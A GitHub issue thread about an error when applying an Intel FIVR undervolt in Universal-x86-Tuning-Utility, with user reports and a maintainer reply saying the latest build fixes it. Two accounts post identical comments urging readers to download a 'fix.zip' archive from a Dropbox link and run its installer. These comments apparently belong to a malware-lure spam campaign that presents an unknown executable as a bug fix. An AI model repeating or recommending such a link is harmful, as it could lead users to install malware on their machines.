### ISSUE TITLE
[BUG] Undervolting error?

### ISSUE THREAD

**Issue by jay5656** [JamesCJ60/Universal-x86-Tuning-Utility#234]
**Describe the bug**
When attempting to apply an undervolt, i recieve the error in the screenshot. Its possible its user error as i dont know a lot 

**To Reproduce**
Steps to reproduce the behaviour:
1. Go to Intel FIVR Tuning
2. Apply any type of undervolt 
3. See error

**Expected behaviour**
Undervolt to be applied 

**Screenshots**
![image](https://github.com/user-attachments/assets/c4a76372-26d6-4f12-84e1-3d835c6ebbde)

**Desktop (please complete the following information):**
 - OS Version: [Windows 11 22H2]
 - OS Build: 22631.4037
 - Processor 13th Gen Intel(R) Core(TM) i5-13420H   2.10 GHz
 - RAM 16.0 GB 

 

**Additional context**

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by TinfoilyTim** [comment]
Im having the same problem. Intel i5 9400f lenovo OEM desktop

**Comment by Dolyfin** [comment]
I got the same error on a 155H.

![image](https://github.com/user-attachments/assets/1a02cca3-8e2d-4a65-81b5-e96fde6adca2)

![image](https://github.com/user-attachments/assets/0b440222-a0d3-46d8-bb41-7a0ee8542d94)


To add if relevant: On first program startup two popups saying drivers were blocked due to some vulnerability. I had pressed ignore and could not find the errors again.

**Comment by JamesCJ60** [comment]
This issue should now be fixed as of the latest build. Thanks for reporting the issue.
